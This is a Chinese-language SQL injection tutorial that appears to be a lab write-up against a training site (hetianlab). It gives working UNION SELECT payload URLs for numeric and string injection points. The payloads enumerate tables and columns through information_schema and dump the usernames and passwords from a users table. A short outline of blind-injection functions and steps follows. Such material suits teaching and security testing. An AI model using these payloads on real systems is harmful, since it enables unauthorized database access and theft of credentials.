sql注入

SQL注入(显错注入)

一般方法:

• 寻找注入点

• 判断闭合方式

• 判断列数以及回显位

• 取数据

实例一 数值型

通过GET请求修改传入id的内容即可实现注入。

将id设置为字符后提示错误，证明无闭合引号。 通过GET请求修改传入id的内容即可实现注入。

将id设置为字符后提示错误，证明无闭合引号:

http://120.27.61.239:8007/source/index.php?id=1asd

通过order by判断列数为3, 再判断回显位:

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%202,%203%20–

回显位在2、3位，因而在对应位置进行爆库。

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20database(),%203%20–

数据库的名称为hetianlab

爆表名:

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),%203%20–

得到数据库的所有表单，经过检索，user是我们所需要的信息。下面获取user的所有字段名:

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27),%203%20–

得到user库的三个字段名:id、username、password,分别对其内容进行查询。

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20(select%20group_concat(id)%20from%20users),%203%20–

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20(select%20group_concat(username)%20from%20users),%203%20–

http://120.27.61.239:8007/source/index.php?id=-1%20union%20select%201,%20(select%20group_concat(password)%20from%20users),%203%20–

至此，user表单的所有内容已经通过注入提取出来。

实例二 字符串型

http://120.27.61.239:8007/source/index1.php?id=a

判断列数，枚举后确认为3列。

http://120.27.61.239:8007/source/index1.php?id=a%27%20union%20select%20%271%27,%20%272%27,%20%273

找回显位:

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,%20%272%27,%20%273

爆表名:

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),%20%273

类似的，我们只关注user表单，首先爆字段名:

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27users%27),%20%273

发现三个字段id、username、password,分别对其内容进行查询。

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,(select%20group_concat(id)%20from%20users),%20%273

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,(select%20group_concat(username)%20from%20users),%20%273

http://120.27.61.239:8007/source/index1.php?id=-1%27%20union%20select%20%271%27,(select%20group_concat(password)%20from%20users),%20%273

至此，该字符串型的users库内容被完全提出。

盲注

盲注常用函数

• substr(string, start, length),下标从1开始

• left/right(string, n)，返回长度为n的前缀、后缀

• ord(char):返回字符的ascii码值

• ascii(string):返回字符串第一个字符的ascii码值

• length(string):字符串长度

• ifnull(str1, str2): str1==null? str2: str1

一般方法

• 确定注入点

• 猜测数据库版本(5.0以下没有information_schema数据库，无法进行手动注入)

• 猜测当前数据库名的长度和名称

• 猜测数据表的数量、名称的长度和名称

• 猜测该数据表中字段的数量、长度和名称

• 猜测字段中的记录